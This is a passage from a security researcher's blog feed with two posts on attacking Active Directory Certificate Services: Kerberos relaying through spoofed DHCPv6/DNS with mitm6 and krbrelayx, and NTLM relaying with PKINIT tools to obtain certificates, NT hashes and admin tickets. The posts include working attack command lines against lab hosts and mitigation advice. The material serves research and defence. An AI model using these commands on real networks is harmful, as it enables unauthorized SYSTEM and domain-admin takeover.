<p>With these 2 solved, there’s nothing really that prevents us from forwarding the Kerberos authentication we receive on our fake DNS server to AD CS. When that is done we can request certificates for the computer account we relayed, and use the NT hash recovery technique or the S4U2Self trick that I talked about in my <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">previous blog</a>. Using these techniques we can get <code class="language-plaintext highlighter-rouge">SYSTEM</code> access on the victim computer, which effectively makes this a reliable RCE as long as an AD CS http endpoint is available for relaying.</p>

<h1 id="changes-to-krbrelayx-and-mitm6">Changes to krbrelayx and mitm6</h1>
<p>Originally, krbrelayx was not really a relaying tool. Instead it was capturing Kerberos TGTs by using unconstrained delegation configured (system) accounts, and using those TGTs in the same manner as ntlmrelayx can use incoming NTLM authentication. Since there is now a use-case to actually relay Kerberos authentication, I’ve updated the functionality in krbrelayx to make it possible to run in relay mode instead of in unconstrained delegation mode. It will actually default to this mode if you don’t specify any NT hashes or AES keys that could be used to extract information from incoming Kerberos authentication. In short, krbrelayx can now be used to relay Kerberos authentication, though only relaying to HTTP and LDAP is supported. As for mitm6, I’ve added the option to specify a relay target, which will be the hostname in the authorative nameserver response when a victim asks queries the SOA record. This will make the victim request a Kerberos service ticket for the service we are targeting rather than for the legitimate DNS server.</p>

<p>One thing to note that this works best when the AD CS server that is targeted is not the DC that the victim is using for Kerberos operations. If they are on the same host (such as in smaller or lab environments) targeting the server which is both a KDC and AD CS server may result in the victim sending it’s Kerberos ticket requests (TGS-REQ) to you instead of the DC. While you could proxy this traffic, this is beyond the scope of this project and you may end up not getting any authentication data.</p>

<p>There is one final hurdle that we have to take. The Kerberos AP-REQ actually does not tell us which user is authenticating, this is only specified in the encrypted part of the Authenticator. So we don’t know which user or machine account is authenticating to us. Luckily for us, this does not really matter in the default AD CS templates scenario, since these allow any name to be specified as CN and it is overwritten by the name in Active Directory anyway. To obtain the best results however, I recommend you scope the attack to one host at the time using mitm6, and to specify that hostname with <code class="language-plaintext highlighter-rouge">--victim</code> in krbrelayx so it will fill in the fields correctly.</p>

<h1 id="attack-example">Attack example</h1>
<p>Let’s see how this looks in practice. First we set up krbrelayx, specifying the AD CS host (in my lab <code class="language-plaintext highlighter-rouge">adscert.internal.corp</code>) as target, and specifying the IPv4 address of the interface as interface to bind the DNS server on. This prevents conflicts with DNS servers that commonly listen on the loopback adapter on for example Ubuntu.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo krbrelayx.py --target http://adscert.internal.corp/certsrv/ -ip 192.168.111.80 --victim icorp-w10.internal.corp --adcs --template Machine
</code></pre></div></div>

<p>Then we set up mitm6, using the name of the AD CS host as relay target:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo mitm6 --domain internal.corp --host-allowlist icorp-w10.internal.corp --relay adscert.internal.corp -v
</code></pre></div></div>

<p>We wait for our victim to get an IPv6 address and connect to our rogue server:</p>

<p><img src="/assets/img/kerberos/dns_relay.png" alt="mitm6 giving out IPv6 addresses and triggering authentication" class="align-center" /></p>

<p>The screenshot shows the victim tried to update their DNS record, which we refused to do because of the lack of authentication. The authentication is sent via TCP to the DNS server of krbrelayx, which accepts this and forwards it to AD CS:</p>

<p><img src="/assets/img/kerberos/adcs_relayed_dns.png" alt="krbrelayx forwarding the authentication to AD CS and obtaining a certificate" class="align-center" /></p>

<p>On the wire, we see the expected flow:</p>

<p><img src="/assets/img/kerberos/krb_dns_wire.png" alt="Kerberos relaying on the wire" class="align-center" /></p>

<ul>
  <li>The victim (<code class="language-plaintext highlighter-rouge">192.168.111.73</code>) queries for a SOA record of their hostname.</li>
  <li>We indicate that our rogue DNS server is the authoritative nameserver, to which the victim will send their dynamic update query.</li>
  <li>The query is refused by mitm6, which will indicate to the victim that they need to authenticate their query.</li>
  <li>The client talks to the KDC to get a Kerberos ticket for the service we indicated.</li>
  <li>The client establishes a TCP connection to krbrelayx and sends a TKEY query containing the Kerberos ticket.</li>
  <li>The ticket is forwarded to the AD CS host which results in our authentication succeeding and a certificate being issued.</li>
</ul>

<p>With this certificate we can use <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a> (or <a href="https://github.com/GhostPack/Rubeus">Rubeus</a> on Windows)to authenticate using Kerberos and impersonate a Domain Admin to gain access to our victim (in this case <code class="language-plaintext highlighter-rouge">icorp-w10</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python gettgtpkinit.py -pfx-base64 MIIRFQIBA..cut...lODSghScECP5hGFE3PXoz internal.corp/icorp-w10$ icorp-w10.ccache
</code></pre></div></div>

<p>With smbclient.py we can list the C$ drive to prove we have admin access:</p>

<p><img src="/assets/img/kerberos/systemaccess.png" alt="Certificate based Kerberos auth resulting in admin access on our victim" class="align-center" /></p>

<h1 id="defenses">Defenses</h1>
<p>This technique abuses insecure defaults in Windows and Active Directory. The primary issues here are the preferrence of IPv6 by Windows, and the bad security defaults on the AD CS web applications. These can be mitigated as follows:</p>

<h2 id="mitigating-mitm6">Mitigating mitm6</h2>
<p>mitm6 abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don’t use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:</p>
<ul>
  <li><em>(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)</em></li>
  <li><em>(Inbound) Core Networking - Router Advertisement (ICMPv6-In)</em></li>
  <li><em>(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)</em></li>
</ul>

<h2 id="mitigating-relaying-to-ad-cs">Mitigating relaying to AD CS</h2>
<p>The default <code class="language-plaintext highlighter-rouge">CertSrv</code> site does not use TLS, this should be enforced first before further protections can be enabled. After enabling TLS with a valid certificte, enabling Extended Protection for authentication in IIS will prevent relay attacks. This should be enabled on all the web-based enrollment features of AD CS on all individual CA servers that offer this service.</p>

<h1 id="tools">Tools</h1>
<p>All the tools mentioned in this blog are available as open source tools on GitHub.</p>

<ul>
  <li>mitm6 <a href="https://github.com/dirkjanm/mitm6">https://github.com/dirkjanm/mitm6</a></li>
  <li>krbrelayx <a href="https://github.com/dirkjanm/krbrelayx">https://github.com/dirkjanm/krbrelayx</a></li>
  <li>PKINITtools <a href="https://github.com/dirkjanm/PKINITtools">https://github.com/dirkjanm/PKINITtools</a></li>
</ul>

<p>Thanks to all the people mentioned in this blog and my previous posts on these topics for their research and tool contributions.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[One thing I love is when I think I understand a topic well, and then someone proves me quite wrong. That was more or less what happened when James Forshaw published a blog on Kerberos relaying, which disproves my conclusion that you can’t relay Kerberos from a few years ago. James showed that there are some tricks to make Windows authenticate to a different Service Principal Name (SPN) than what would normally be derived from the hostname the client is connecting to, which means Kerberos is not fully relay-proof as I assumed. This triggered me to look into some alternative abuse paths, including something I worked on a few years back but could never get to work: relaying DNS authentication. This is especially relevant when you have the ability to spoof a DNS server via DHCPv6 spoofing with mitm6. In this scenario, you can get victim machines to reliably authenticate to you using Kerberos and their machine account. This authentication can be relayed to any service that does not enforce integrity, such as Active Directory Certificate Services (AD CS) http(s) based enrollment, which in turn makes it possible to execute code as SYSTEM on that host as discussed in my blog on AD CS relaying. This technique is faster, more reliable and less invasive than relaying WPAD authentication with mitm6, but does of course require AD CS to be in use. This blog describes the background of the technique and the changes I made to krbrelayx to support Kerberos relaying for real this time.]]></summary></entry><entry><title type="html">NTLM relaying to AD CS - On certificates, printers and a little hippo</title><link href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/" rel="alternate" type="text/html" title="NTLM relaying to AD CS - On certificates, printers and a little hippo" /><published>2021-07-28T17:08:57+00:00</published><updated>2021-07-28T17:08:57+00:00</updated><id>https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services</id><content type="html" xml:base="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"><![CDATA[<p>I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how and the why, and new attack vectors coming up fast now, I figured I’d write a short post with some more details and background. Hardly anything here is my own research, so I don’t take credit for any of this, but since these issues are “by design” and will likely not see a patch or significant change soon, they are quite relevant. That’s why I decided to write some Python tools around it and explain the process in this post. The tools are available on my <a href="https://github.com/dirkjanm/PKINITtools">GitHub</a>.</p>

<h2 id="background---the-state-of-ntlm-relaying">Background - the state of NTLM relaying</h2>
<p>I’ve written quite some times about NTLM relaying ever since I started contributing to ntlmrelayx in 2017. Despite NTLM relaying mitigations that were introduced ever since the first NTLM relay attacks that were introduced around 2001, the past few years have seen many exploits, but hardly any new mitigations to make this horrible protocol more secure. Even the scheduled change to <a href="https://support.microsoft.com/en-us/topic/2020-ldap-channel-binding-and-ldap-signing-requirements-for-windows-ef185fb8-00f7-167d-744c-f299a66fc00a">enforce LDAP signing and channel binding</a> by default, which was supposed to be deployed in 2020, ultimately did not ship, likely due to many third-party products not being compatible with this. This meant that in the default state with fully up-to-date systems, it was possible to:</p>

<ul>
  <li>Relay NTLM authentication occurring over HTTP to LDAP, resulting in <a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">computer account takeover</a></li>
  <li>Relay authentication over SMB to HTTP endpoints, but not to LDAP because of a signing requirements <a href="https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/">mismatch</a>. Since no research was published on high-value default HTTP endpoints, this prevented exploitation of ways to get authenticated SMB connections via the infamous <a href="https://github.com/leechristensen/SpoolSample/">Printer Bug</a>.</li>
</ul>

<p>This all changed when <a href="https://twitter.com/tifkin_">Lee Christensen</a> and <a href="https://twitter.com/harmj0y">Will Schroeder</a> published their whitepaper on <a href="https://posts.specterops.io/certified-pre-owned-d95910965cd2">abusing Active Directory Certificate Services</a>. In this whitepaper they describe an attack called ESC8, which involves NTLM relaying to the HTTP interface part of the certificate service, which issues certificates. Because this interface accepts NTLM authentication without support for signing, it is possible to:</p>

<ol>
  <li>Request an authenticated back-connect with the Printer Bug over MS-RPRN, as long as the spool service is running on the victim system.</li>
  <li>Receive this authentication and relay this to the certificate services web interface.</li>
  <li>Request a certificate on behalf of the victim system.</li>
  <li>Use the issued certificate to impersonate the victim system.</li>
  <li>Either use the privileges of the victim system directly (for example in the case of a Domain Controller), or use Kerberos features to request a service ticket with administrative access to the host itself or request the NT hash for the system account which allows you to create a silver ticket.</li>
</ol>

<p>The printer bug has already been known for quite a while and has been a component in many attacks. Disabling the printer spooler service has been a common recommendation ever since, and has recently been brought to light again with the PrintNightmare exploit, which also relied on the spooler service being active. It was kind of a given that other methods must exist for coercing authentication via RPC methods, and I expect some are also keeping these methods private. Following the AD CS release, <a href="https://twitter.com/topotam77">Lionel Gilles</a> released a new proof-of-concept way to exploit this last week called <a href="https://github.com/topotam/PetitPotam">PetitPotam</a>. Unlike the printer bug, which uses MS-RPRN and requires authentication, this attack is an alternative method that does not rely on the printer spooler service being active, and does not require authentication when attacking a Domain Controller. This makes it an even more valuable attack alternative, as there is no official way as of now to disable this authenticated callback and there is no indication of a fix in sight.</p>

<h2 id="exploring-ad-cs-relaying">Exploring AD CS relaying</h2>
<p>After Will and Lee published their whitepaper, I was curious whether I could reproduce their attack on relaying to the certificate services web interface. ntlmrelayx is plugin based and quite modular, so the only thing that would likely be required is changing the <a href="https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/ntlmrelayx/attacks/httpattack.py">http attack</a> method to post the right data. After ensuring the web enrolment service is installed in my lab, I went to have a look at the source code of the service. This source is stored in <code class="language-plaintext highlighter-rouge">C:\Windows\system32\CertSrv\en-US</code> on the server where the AD CS service is installed (in my case and in many others this will probably be the Domain Controller). I imagine the last folder may be different if you installed your system in a different language. Since the pages are written in classic ASP, it is not that hard to read the source code. The copyright mentions 1998 - 1999, which is always a great sign if you’re looking for things with a less than ideal security configuration.</p>

<p>When visiting the AD CS web interface at <code class="language-plaintext highlighter-rouge">http://dc-hostname/certsrv/</code>, we can authenticate using NTLM and a machine account. An easy way to obtain a machine account is with impacket’s <code class="language-plaintext highlighter-rouge">addcomputer.py</code>, which can be used as any authenticated user to add a new computer account by default (note that we’re only doing this to understand the attack in the lab, this is not required for the final attack). We can then use NTLM to authenticate to the AD CS web service (it’s easier to do this from a non-domain joined computer or from a browser that doesn’t perform Single Sign On). In this case I’m using Chrome, which can perform NTLM auth by using the <code class="language-plaintext highlighter-rouge">computername$@domain.fqdn</code> syntax in the credential prompt. This lets us authenticate as a computer account to the web service. Upon following the certificate request process, we get the following error message: “No certificate templates could be found. You do not have permission to request a certificate from this CA, or an error occurred while accessing the Active Directory.”. At first I thought this indicated a problem with my setup, because computer certificate templates are available by default. After some debugging and reading the source I found the reason in <code class="language-plaintext highlighter-rouge">certsgcl.inc</code>:</p>

<p><img src="/assets/img/adcs/cert_machine.png" alt="Machine certificates are not selected by the web UI" class="align-center" /></p>

<p>As we can see in the highlighted section, whenever the “choice” of certificate templates is rendered in the web page, the server does not actually query for machine templates. The reasoning behind this is probably that machines are not quite supposed to use the guided way of requesting certificates, so it doesn’t make sense to render them. Does this mean that we can’t request machine certificates via this interface? Not quite, as the page where the final request is submitted does not actually perform this check but simply submits the request to the CA, so we could use any certificate template here. I’ve patched the file and added the constant to also search for machine templates, and the template appears in the UI:</p>

<p><img src="/assets/img/adcs/patchedreq.png" alt="Patched web UI to show computer template" class="align-center" /></p>

<p>Now we can submit a basic request. The only requirement is that we selected the correct template (Computer) and use the hostname of our newly created computer as Common Name. Note that this must match the <code class="language-plaintext highlighter-rouge">dNSHostname</code> attribute of the computer object, so make sure you run <code class="language-plaintext highlighter-rouge">addcomputer.py</code> with the <code class="language-plaintext highlighter-rouge">-method LDAPS</code> option otherwise this won’t be the case for our test account. We can create this with openssl, and then submit the request. We see that is immediately issued to us, because the default Computer template does not require approval.</p>

<p><img src="/assets/img/adcs/manualcertreq.png" alt="Openssl request" class="align-center" /></p>

<p><img src="/assets/img/adcs/issued.png" alt="Cert issued" class="align-center" /></p>

<p>Requesting this with the dev tools open will show us the POST request, which goes to <code class="language-plaintext highlighter-rouge">certfnsh.asp</code>.</p>

<p><img src="/assets/img/adcs/certpost.png" alt="Cert issued" class="align-center" /></p>

<p>With this information we can build our custom AD CS relay attack. The template for the <a href="https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/ntlmrelayx/attacks/httpattack.py">http attack</a> in ntlmrelayx begins with an authenticated session. Building on this we can create a private key and certificate on the fly, and submit this request to the CA. After submitting the request, we get the certificate that was issued to us and use it to authenticate.</p>

<p>The template that can be used depends on the account that is relayed. For a member server or workstation, the template would be “Computer”. For Domain Controllers this template gives an error because a DC is not a regular server and is not a member of “Domain Computers”. So if you’re relaying a DC then the template should be “DomainController” to match.</p>

<p>I did not initially want to publish the exploit code because Will and Lee also held off publishing theirs, but of course several people managed to reproduce the same attack pattern as above based on the whitepaper. A <a href="https://github.com/SecureAuthCorp/impacket/pull/1101">pull request</a> for impacket soon appeared by user ExAndroidDev, which implements more or less the same code. If you’re curious about my implementation, I included a proof-of-concept version of the <a href="https://github.com/dirkjanm/PKINITtools/blob/master/ntlmrelayx/httpattack.py">http attack</a> file in the PKINITtools repository. If you want to play with this template you’ll have to change the template and the domain manually before copying it to the correct impacket directory and running ntlmrelayx. Below is an example of the attack running:</p>

<p><img src="/assets/img/adcs/petitpotam.png" alt="Running petitpotam" class="align-center" /></p>

<p><img src="/assets/img/adcs/adcsrelay.png" alt="Obtaining a certificate" class="align-center" /></p>

<p>Note that this is <strong>fully unauthenticated</strong> (a feature of PetitPotam when used against DC’s) and instantly escalates to Domain Controller privileges.</p>

<h2 id="abusing-the-obtained-certificate---diving-into-pkinit">Abusing the obtained certificate - diving into PKINIT</h2>
<p>To actually use these certificates for Kerberos with PKINIT, we can use either <a href="https://github.com/GhostPack/Rubeus/">Rubeus</a> or <a href="https://github.com/gentilkiwi/kekeo">kekeo</a>. Both of these tools have the downside that they only work on Windows. Originally I wanted to see if I could also port the PKINIT functionality to impacket, because if I could manage to get a regular TGT from the initial PKINIT operation this would allow us to use it with the other impacket tools such as secretdump and smbclient without any additional changes. I went down the rabbit hole of implementing the PKINIT ASN1 structures in impacket, but soon found out that the PKINIT specification itself uses structures from a multitude of different RFCs for it’s cryptographic operations. I did some more searching for projects that already used PKINIT in Python and found that <a href="https://github.com/morRubin/AzureADJoinedMachinePTC">AzureADJoinedMachinePTC</a> has an impacket based implementation, and that SkelSec’s <a href="https://github.com/skelsec/minikerberos">minikerberos</a> has a custom implementation as well. Both these implementations are written for Azure AD joined devices to use SMB and authenticate with certificates. This differs from our goal because Azure AD uses user-to-user (U2U) Kerberos without a central KDC. The PKINIT process is embedded in NegoEx over SMB. For using certificates in Active Directory, we don’t need the U2U implementation or the NegoEx parts. But most of the code for PKINIT was already there so I decided to built forth on that rather than reinvent the wheel. The minikerberos project was the implementation of choice because AzureADJoinedMachinePTC does not actually implement the required signing operations in Python, but uses Windows API’s for that, which prevents it on working on other operating systems.</p>

<p>I will save you the rant about ASN1 and about the many hours it took me to figure out that Active Directory for some reason does not consider Diffie-Hellman parameters generated by the <code class="language-plaintext highlighter-rouge">cryptography</code> library strong enough (without documentation I could find about the requirements or about why this is), so I had to borrow some known-safe primes instead. The end result of this is a simple command line tool that can take a certificate and private key, either in PFX or in PEM format, and request a TGT using PKINIT.</p>

<p><img src="/assets/img/adcs/gettgtpkinit.png" alt="Request TGT using PKINIT" class="align-center" /></p>

<h3 id="obtaining-the-nt-hash-of-the-impersonated-computer-account">Obtaining the NT hash of the impersonated computer account</h3>
<p>One of the features described in the <a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">whitepaper</a> from Will and Lee is the ability to obtain the original NT hash for an account by using the certificate. This is described as “THEFT5” in the whitepaper. The reason behind this is that when certificate authentication is used and a TGT is obtained, there has to be some way for the account performing the authentication to fall back to NTLM authentication if Kerberos is not supported. For that reason, the KDC will supply the NT hash of the account in the PAC that is added to the TGT (if you’re not sure what a PAC is or what is in there, I recommend you read <a href="https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/">my blog on forest trusts</a>).</p>

<p>There is some interesting process involved in this. Whenever PKINIT authentication is used, the KDC adds the NT hash in an encrypted format to the PAC. This is encrypted with the same key as that is negotiated between the KDC and the client for encrypting the session key for the TGT. This key is negotiated with Diffie-Hellman key exchange or is encrypted using the public key of the certificate, depending on the implementation. The result of this is a key called the “AS reply key” in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/cc919d0c-f2eb-4f21-b487-080c486d85fe">documentation in MS-PAC</a>. The PAC is contained inside the TGT, which is encrypted with one of the Kerberos keys of the <code class="language-plaintext highlighter-rouge">krbtgt</code> account. This makes it impossible for our client to actually read the PAC.</p>

<p>The way to read the PAC and to access the NT Hash is done via the Kerberos user to user (U2U) extensions. This extension <a href="https://datatracker.ietf.org/doc/html/draft-ietf-cat-user2user-02">introduces</a> an option called <code class="language-plaintext highlighter-rouge">ENC-TKT-IN-SKEY</code>, which encrypts the resulting service ticket using the session key from a supplied TGT rather than with the key of the target service/user. This session key is in our possession (we need it to use our TGT), so we can use this to decrypt the service ticket, containing the PAC. The whole process is as follows:</p>

<ol>
  <li>Request a TGT using PKINIT and note down the AS reply key (the <code class="language-plaintext highlighter-rouge">gettgtpkinit.py</code> tool prints the key for you as you can see in the screenshot above).</li>
  <li>Request a service ticket to ourself, while supplying the <code class="language-plaintext highlighter-rouge">ENC-TKT-IN-SKEY</code> option and adding the TGT that was issued to us to the “additional tickets” section of the <code class="language-plaintext highlighter-rouge">TGS-REQ</code></li>
  <li>The KDC will copy over the PAC, with the encrypted NT hash, to the ticket that is issued, and will encrypt this ticket with the session key of our TGT (which is known to us)</li>
  <li>Using the session key we can decrypt the ticket, extract the PAC, and parse + decrypt the NT hash using the AS reply key</li>
</ol>

<p>The proof-of-concept for this, which is mostly based on <code class="language-plaintext highlighter-rouge">getPac.py</code> from impacket and on reading the kekeo source code is called <code class="language-plaintext highlighter-rouge">getnthash.py</code>. Here’s a demo:</p>

<p><img src="/assets/img/adcs/getnthash.png" alt="Obtaining the NT hash for the computer account" class="align-center" /></p>

<h4 id="abuse">Abuse</h4>
<p>With the NT hash in our possession (which is the NT hash of the computer account that we originally relayed), we can perform attacks as that account using any tool that supports hashes for machine authentication. Alternatively, to get access to the original host we could use the hash as RC4 Kerberos key to create a silver ticket, which can contain any user claim and will be accepted by the host.</p>

<h3 id="using-s4u2self-to-obtain-access-to-the-relayed-machine">Using S4U2Self to obtain access to the relayed machine</h3>
<p>There is another approach to obtain access to the machine we originally relayed. Aside from using the NT hash for a silver ticket, we can also use the TGT from earlier directly. This can be done via S4U2Self. If you’re not familiar with this, the S4U2Self extension makes it possible for a Kerberos service to request a ticket on behalf of anyone towards itself, as long as the service has an SPN registered. This is also (ab)used in many delegation scenario’s, and was documented as attack by <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#solving-a-sensitive-problem">Elad Shamir</a>. The relevant bit is that because we have a TGT for the system we want to attack, we can request a legitimate service ticket for any user that is accepted by the original system (since it’s encrypted with it’s own service key). I once again wrote a small command line tool for this based on some minikerberos example, which is called <code class="language-plaintext highlighter-rouge">gets4uticket.py</code>. You should supply the ccache containing the TGT and an SPN that belongs to the system for which the TGT was issued. Then we can ask for a ticket for any user, in this case the “Administrator” user.</p>

<p><img src="/assets/img/adcs/gets4uticket.png" alt="Obtaining a ticket via S4U2self" class="align-center" /></p>

<p>This ticket does indeed have Administrative access on my domain controller, as demonstrated by the ability to list the contents of the <code class="language-plaintext highlighter-rouge">c$</code> drive:</p>

<p><img src="/assets/img/adcs/smbclient_admin.png" alt="Administrative rights" class="align-center" /></p>

<h2 id="other-abuse-avenues-of-petitpotam">Other abuse avenues of PetitPotam</h2>
<p>PetitPotam also makes it possible to cause a backconnect over WebDAV, provided the webdav service is running. The advantage of WebDAV is that authentication happens over HTTP, which can be relayed to LDAP in the default configuration. This makes it possible to perform attacks based on Resource Based Constrained Delegation, similar to previous <a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">blogs</a> on <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html">this</a> <a href="https://posts.specterops.io/another-word-on-delegation-10bdbe3cd94a">topic</a>. <a href="https://twitter.com/gladiatx0r/">Maximus</a> recently wrote a nicely summarized <a href="https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb">Gist</a> on this which contains the required steps and ways to get the WebDAV service running.</p>

<h1 id="defenses">Defenses</h1>
<p>There has already been written a lot about defenses on this topic, and there are extensive guidelines on mitigating relaying to AD CS in Lee and Will’s <a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">whitepaper</a>. There is also the <a href="https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429">official Microsoft recommendation</a>. Personally I’d like to summarize the possible defenses as follows:</p>

<ul>
  <li>Mitigate NTLM relaying attacks as much as possible by enforcing security features on sensitive services, such as LDAP signing + channel binding on the DCs and HTTPS + enhanced protection on IIS based services.</li>
  <li>Prevent services from authenticating to arbitrary workstations by disallowing traffic initiated from servers to workstations. An allowlist of required connections could be used if server to workstation traffic is required for some services.</li>
  <li>Disable known vulnerable services as much as possible (Spooler Service).</li>
  <li>Work on phasing out NTLM entirely.</li>
</ul>

<h1 id="credits--thanks--tools">Credits / Thanks / Tools</h1>
<p>As stated before, not much of this is my original work, and all credits go to the people referenced already in this post. The tools/adaptions shown in this blog are available on my GitHub under <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a>.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how and the why, and new attack vectors coming up fast now, I figured I’d write a short post with some more details and background. Hardly anything here is my own research, so I don’t take credit for any of this, but since these issues are “by design” and will likely not see a patch or significant change soon, they are quite relevant. That’s why I decided to write some Python tools around it and explain the process in this post. The tools are available on my GitHub.]]></summary></entry></feed>